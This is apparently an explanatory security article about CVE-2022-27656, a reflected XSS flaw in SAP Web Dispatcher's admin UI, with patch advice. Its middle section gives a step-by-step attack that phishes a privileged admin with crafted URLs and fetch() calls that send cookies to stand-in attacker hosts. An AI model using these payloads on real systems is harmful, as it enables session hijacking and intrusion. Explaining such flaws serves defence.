SAP is the backbone of many enterprises worldwide. Keeping it secure is crucial. In March 2022, a serious XSS vulnerability was discovered in the Web administration UI of SAP Web Dispatcher and the Internet Communication Manager (ICM). Tracked as CVE-2022-27656, this bug opens the door for attackers to perform Cross-Site Scripting (XSS) attacks and potentially compromise business-critical SAP systems. In this article, we’ll unpack the issue, show you how the exploit works in plain terms, and discuss ways you can defend your organization against it.
What is CVE-2022-27656?
In short, the Web Administration UI for SAP Web Dispatcher and ICM didn’t properly handle user-controlled input. When someone entered data, the web interface did not sanitize it correctly before displaying it—this is a classic XSS setup. If an attacker gets a user (like an admin or another user with enough rights) to click a specially-crafted link or load a corrupt web page, malicious JavaScript could run in the victim’s browser—stealing session data, hijacking authentication, and more.
Affected Components: SAP Web Dispatcher & ICM Web Admin UI (multiple versions)
- CVE: CVE-2022-27656
CVSS Score: 6.1 (Medium)
Official SAP Security Note:
- SAP Security Note 3123427 (requires SAP login)
How Does the Vulnerability Work?
When a user interacts with the web admin UI, their input (such as the values in search boxes or form fields) is echoed back into the page without being safely encoded. If a malicious actor crafts input containing JavaScript, this script gets executed in the browser. Imagine you’re an admin visiting a report page, and an attacker convinces you to click a link. That link includes code that *the UI displays but doesn’t sanitize*, causing your browser to execute it.
Suppose the web admin UI has a URL like
http://<sap-webdispatcher>:<port>/sap/adminUI?param=<userinput>;
If <userinput> is not encoded, an attacker can inject a script like this
http://<sap-webdispatcher>:<port>/sap/adminUI?param=<script>alert('Hacked!')</script>;
If the UI just inserts param into the page without escaping angle brackets, users will see a popup—proof that arbitrary JavaScript ran in their browser!
Here’s a *basic* XSS payload you could try (DO NOT use on any system without permission)
<script>
// This will pop up an alert box
alert('Hacked by XSS!');
</script>
To use this in a real-world scenario, you would send a crafted URL to a logged-in SAP admin
http://sap-admin.company.com:800/sap/adminUI?param=<script>alert('Hacked by XSS!')</script>
What happens?
If the vulnerability is present, the admin’s browser will run the JavaScript—this could be used to steal their session with:
<script>
fetch('https://evil.example.com/steal?cookie='; + document.cookie);
</script>
Step 1: Create a malicious URL
http://target-sap:800/sap/adminUI?param=<script>fetch('https://evil.com/xss?c='+document.cookie)</script>;
Step 2: Trick a privileged user into clicking the link
This might be via phishing, an internal chat, or even by embedding in an HTML email.
Step 3: Harvesting cookies
If the admin is logged in, their session cookie gets sent to the attacker’s server—and they can hijack the session.
SAP Response
SAP provided security patches as soon as the issue was discovered. If you’re running SAP Web Dispatcher or ICM, check whether you’re running a vulnerable version and apply the patch from:
- SAP Note 3123427
References & Further Reading
- SAP Security Patch Day – March 2022
- CVE-2022-27656 at MITRE
- OWASP XSS Guide
Summary
The CVE-2022-27656 XSS vulnerability in SAP Web Dispatcher and ICM was a clear reminder: even “backend” admin interfaces are exposed and attractive targets. We’ve broken down how attackers can do real harm with just a little unescaped text input. If you manage SAP systems, check your versions, patch up, and don’t leave the door open to hackers!
Timeline
Published on: 05/11/2022 15:15:00 UTC
Last modified on: 05/19/2022 17:49:00 UTC